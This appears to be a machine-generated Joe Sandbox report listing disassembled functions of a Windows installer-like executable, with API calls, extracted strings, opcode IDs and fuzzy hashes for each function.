                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: GlobalParam$EnabledLockMessagePostReuseUnlockUnpackWindowlstrcpyn
                                                                                  • String ID:
                                                                                  • API String ID: 2333435275-0
                                                                                  • Opcode ID: 80c4f473cda63ebbe29d2c3595a2067c467c10bd839c859f2be82989af61cddf
                                                                                  • Instruction ID: 03520cb8da1c923db593af3c715295f8be7c9964e64948a690e3b8b2b3f7d9f9
                                                                                  • Opcode Fuzzy Hash: 80c4f473cda63ebbe29d2c3595a2067c467c10bd839c859f2be82989af61cddf
                                                                                  • Instruction Fuzzy Hash: 4801AD76600108BFDB01AFA0DC89EDF7BBDEF58304F00417AB90996162DB749E059B64
                                                                                  Function 0046CD86 Relevance: 9.0, APIs: 6, Instructions: 46windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0046CD8B
                                                                                  • IsWindow.USER32(?), ref: 0046CD9C
                                                                                  • SendMessageA.USER32(?,000000C5,00000000,00000000), ref: 0046CDB7
                                                                                    • Part of subcall function 004C94CC: GetWindowTextLengthA.USER32(?), ref: 004C94D6
                                                                                  • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0046CDCD
                                                                                  • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 0046CDDB
                                                                                  • SendMessageA.USER32(?,000000C2,00000000,?), ref: 0046CDEA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window$H_prologLengthText
                                                                                  • String ID:
                                                                                  • API String ID: 2803492554-0
                                                                                  • Opcode ID: a702a643b5e5a44385a8b2f01cfd01b76f42f18e3b5bbc5b36b646c2f14fe66f
                                                                                  • Instruction ID: 0960bf1b42167d127a6d45e25069faa4d2924323ff47d2c0fe7479da4a10b235
                                                                                  • Opcode Fuzzy Hash: a702a643b5e5a44385a8b2f01cfd01b76f42f18e3b5bbc5b36b646c2f14fe66f
                                                                                  • Instruction Fuzzy Hash: 5901D631640714FBEB25AF21CC45F9EBF68EF44794F10812BB511AA0E1CBB4AD11DA94
                                                                                  Function 00468388 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0046838D
                                                                                    • Part of subcall function 0045E445: IsWindow.USER32(?), ref: 0045E45D
                                                                                    • Part of subcall function 0045E445: GetClientRect.USER32(?,?), ref: 0045E49A
                                                                                    • Part of subcall function 004689D6: __EH_prolog.LIBCMT ref: 004689DB
                                                                                    • Part of subcall function 0047AAD1: __EH_prolog.LIBCMT ref: 0047AAD6
                                                                                    • Part of subcall function 004603AA: __EH_prolog.LIBCMT ref: 004603AF
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                    • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                    • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$Interlocked$ClientDecrementIncrementRectWindowlstrlen
                                                                                  • String ID: IDS_CTRL_BUTTON_BACK$IDS_CTRL_BUTTON_CANCEL$IDS_CTRL_BUTTON_HELP$IDS_CTRL_BUTTON_NEXT
                                                                                  • API String ID: 3293047042-2679619293
                                                                                  • Opcode ID: d8a3774e77b3fd3590e29db3d57dbd696cb2cdaf0d1815ef2357dc87ca4e7c0a
                                                                                  • Instruction ID: 400d5ad09e73d13d885dbaef853bc776472cde1c6edf188b783ca20929b7f525
                                                                                  • Opcode Fuzzy Hash: d8a3774e77b3fd3590e29db3d57dbd696cb2cdaf0d1815ef2357dc87ca4e7c0a
                                                                                  • Instruction Fuzzy Hash: 00819471A006099FCF04DF69C941ADE37A5FF09314F01422EFC15EB292EBB9AA45CB95
                                                                                  Function 00420EB6 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 225stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00420EBB
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                    • Part of subcall function 004C6033: lstrlen.KERNEL32(?,?,00000000,004C5E52,005247C8,00403DCA,00000000,00403C1B,00000000,00000000,004019FC,?), ref: 004C6044
                                                                                  • __ftol.LIBCMT ref: 00420F46
                                                                                    • Part of subcall function 004C585E: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004C5879
                                                                                    • Part of subcall function 004C585E: GetLastError.KERNEL32(?), ref: 004C5886
                                                                                  • lstrcpy.KERNEL32(?,?), ref: 00420F8A
                                                                                  • lstrcpy.KERNEL32(?,?), ref: 00420F96
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$lstrcpy$ErrorFileLastWrite__ftollstrlen
                                                                                  • String ID: L
                                                                                  • API String ID: 3975041301-2909332022
                                                                                  • Opcode ID: 4e7f7e936cc875fe5ba0a7eb00af0df96bf29978a0ed9054de16c99adb453f62
                                                                                  • Instruction ID: 76fddcd22bd630e008c54fb2a1d978e21336fd943299fcb8d7bbd3289b956179
                                                                                  • Opcode Fuzzy Hash: 4e7f7e936cc875fe5ba0a7eb00af0df96bf29978a0ed9054de16c99adb453f62
                                                                                  • Instruction Fuzzy Hash: 9081C075D00248EECF05EBA5DC42BEEBBB4AF14308F10806FE505B2192DB391B49CB69
                                                                                  Function 0046C9D3 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 200COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0046C9D8
                                                                                    • Part of subcall function 00468388: __EH_prolog.LIBCMT ref: 0046838D
                                                                                  • GetDC.USER32(?), ref: 0046CB2B
                                                                                  • ReleaseDC.USER32(?,?), ref: 0046CB84
                                                                                  Strings
                                                                                  • IDS_CTRL_HEADINGTEXT_BODY, xrefs: 0046CAA5
                                                                                  • IDS_CTRL_STATICTEXT_BODY, xrefs: 0046CA5C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$Release
                                                                                  • String ID: IDS_CTRL_HEADINGTEXT_BODY$IDS_CTRL_STATICTEXT_BODY
                                                                                  • API String ID: 4065112704-3606236380
                                                                                  • Opcode ID: a940f1d11d32cd1209a7a2244eb79ba5ac3e9fb4beef388d05a7c1ba29249bb3
                                                                                  • Instruction ID: f219300eb766582377f6677a51dbe486fc020a33182b9b6bc0bae3f1e035b6cb
                                                                                  • Opcode Fuzzy Hash: a940f1d11d32cd1209a7a2244eb79ba5ac3e9fb4beef388d05a7c1ba29249bb3
                                                                                  • Instruction Fuzzy Hash: 817188719006099FCF01DF59C881AEEBBB2FF49314B00812EFC19AB251D7B9AA45CF95
                                                                                  Function 00438FCC Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 198COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00438FD1
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                  • __ftol.LIBCMT ref: 00439000
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$__ftol
                                                                                  • String ID: %02d$%s-%s-%s$%s/%s/%s
                                                                                  • API String ID: 386204849-249781767
                                                                                  • Opcode ID: d9bfc0921007e1f8c0faf7a6a2ab2f45341fe25ad595b2b7ecb8ba32afdcf0a4
                                                                                  • Instruction ID: f3e52cae9ae024bd0d6265c8257076e58d68f5538c5c6463cff7538b95903e18
                                                                                  • Opcode Fuzzy Hash: d9bfc0921007e1f8c0faf7a6a2ab2f45341fe25ad595b2b7ecb8ba32afdcf0a4
                                                                                  • Instruction Fuzzy Hash: 606190B6D00109ABDF04DBE5CD46EEEBBB9EF18304F14042EF501B6151D7B99A05CB64
                                                                                  Function 00468117 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 194COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0046811C
                                                                                    • Part of subcall function 0044FC1E: __EH_prolog.LIBCMT ref: 0044FC23
                                                                                    • Part of subcall function 0047AAD1: __EH_prolog.LIBCMT ref: 0047AAD6
                                                                                    • Part of subcall function 004603AA: __EH_prolog.LIBCMT ref: 004603AF
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$DecrementInterlocked
                                                                                  • String ID: IDS_CTRL_BUTTON_BACK$IDS_CTRL_BUTTON_CANCEL$IDS_CTRL_BUTTON_HELP$IDS_CTRL_BUTTON_NEXT
                                                                                  • API String ID: 2206737547-2679619293
                                                                                  • Opcode ID: a3f3b65316b98b94cf0b9e912e700f2dbe178ac0de3f89540e27e206b973e947
                                                                                  • Instruction ID: d3287a7e1ee0420e867fcb5a16a498850322c23a212d365a6c6c3676f494c591
                                                                                  • Opcode Fuzzy Hash: a3f3b65316b98b94cf0b9e912e700f2dbe178ac0de3f89540e27e206b973e947
                                                                                  • Instruction Fuzzy Hash: 46719570900B06EBCB04EFAAC956AAEBBB4FF44314F10421FE515932C1DB786A51CBA5
                                                                                  Function 00438C36 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 188COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00438C3B
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                    • Part of subcall function 0041EDCC: __EH_prolog.LIBCMT ref: 0041EDD1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: Drive$Extension$Filename$Folder
                                                                                  • API String ID: 3519838083-2892895018
                                                                                  • Opcode ID: 9ecc480f505c47679f975e766091ba30f53ba94f8ffa8f15b7ba290771b433b2
                                                                                  • Instruction ID: a98883c0c597642585fa9aef50964176b97303a8b4847b0a50b363a15490d20c
                                                                                  • Opcode Fuzzy Hash: 9ecc480f505c47679f975e766091ba30f53ba94f8ffa8f15b7ba290771b433b2
                                                                                  • Instruction Fuzzy Hash: D551D732805219BADB05EB56DC42EEEBB78AF25328F20011FF411B21D1DF7C5B4286AD
                                                                                  Function 0041CAAE Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 183COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0041CAB3
                                                                                    • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prologIncrementInterlocked
                                                                                  • String ID: 0:R$DIRECT$PROXY$SOCKS
                                                                                  • API String ID: 1487423697-3623570745
                                                                                  • Opcode ID: ada8f0a84018501a20d66321760a132a19b1a75b1e7a85cba4c765be8950b41a
                                                                                  • Instruction ID: 1663e7dfa307c1280a13a731145daf0402fd0f10e9e89f1c2dab1e25c8732c8e
                                                                                  • Opcode Fuzzy Hash: ada8f0a84018501a20d66321760a132a19b1a75b1e7a85cba4c765be8950b41a
                                                                                  • Instruction Fuzzy Hash: 22618375500649EFDB04EF61D995EEE3B68EF14348F00411EF806A7281EB78AB85C765
                                                                                  Function 004211A4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 174stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004211A9
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                  • __ftol.LIBCMT ref: 00421212
                                                                                  • lstrcpy.KERNEL32(?,?), ref: 0042123A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$__ftollstrcpy
                                                                                  • String ID: L$ThN
                                                                                  • API String ID: 3311569883-595882344
                                                                                  • Opcode ID: 4fef0fd269106a82c2989f7ee4e76ca488a952d30c424b1588afd146aa3f8a0f
                                                                                  • Instruction ID: d926710024837a1e6cedaf2324535c13e1a2f2305ec22ba67c9c409ad1972c35
                                                                                  • Opcode Fuzzy Hash: 4fef0fd269106a82c2989f7ee4e76ca488a952d30c424b1588afd146aa3f8a0f
                                                                                  • Instruction Fuzzy Hash: 2E51C035C01259EADF00EBE5DC42AEEBBB4EF14318F14405FF401B6292DB791A85CB69
                                                                                  Function 00430CA2 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 163libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00430CA7
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                    • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                    • Part of subcall function 0042E792: LoadLibraryA.KERNEL32(00000000), ref: 0046EB47
                                                                                  • GetProcAddress.KERNEL32(00000000,MsiGetFileVersionA), ref: 00430D11
                                                                                    • Part of subcall function 004C6033: lstrlen.KERNEL32(?,?,00000000,004C5E52,005247C8,00403DCA,00000000,00403C1B,00000000,00000000,004019FC,?), ref: 004C6044
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$lstrlen$AddressLibraryLoadProc
                                                                                  • String ID: 0:R$Language$MsiGetFileVersionA
                                                                                  • API String ID: 730962311-2344496616
                                                                                  • Opcode ID: 0e0cc3fe1d5a7cce0b869a926291602594d559e6ef8dcfc7ef73d4cd6fa0e16d
                                                                                  • Instruction ID: ad12c459bc7beb1c7c3100d8cd87572649b95b7d7b7431e5de289172ba2aefa2
                                                                                  • Opcode Fuzzy Hash: 0e0cc3fe1d5a7cce0b869a926291602594d559e6ef8dcfc7ef73d4cd6fa0e16d
                                                                                  • Instruction Fuzzy Hash: 95519F72C00119AACF05BBE5DC82DFFBB78AF59318F14052FF51172192DB3C1A469669
                                                                                  Function 0043826F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 140COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00438274
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                  • __ftol.LIBCMT ref: 004382AE
                                                                                  • __ftol.LIBCMT ref: 004382C1
                                                                                    • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$__ftol$lstrlen
                                                                                  • String ID: string$sub
                                                                                  • API String ID: 2341014993-840957247
                                                                                  • Opcode ID: adf2a7eb88be220b28ef7be46605e97a351adad90b56ddfb9ffad6d0991728f6
                                                                                  • Instruction ID: 381909d5fdf81ba84d1b693d844039a228266b458f74f633bec1436e6fbcf363
                                                                                  • Opcode Fuzzy Hash: adf2a7eb88be220b28ef7be46605e97a351adad90b56ddfb9ffad6d0991728f6
                                                                                  • Instruction Fuzzy Hash: E3412431809615B6DB15B766DC02FDE76289F56728F240A0FF821722D2EF7D174243AE
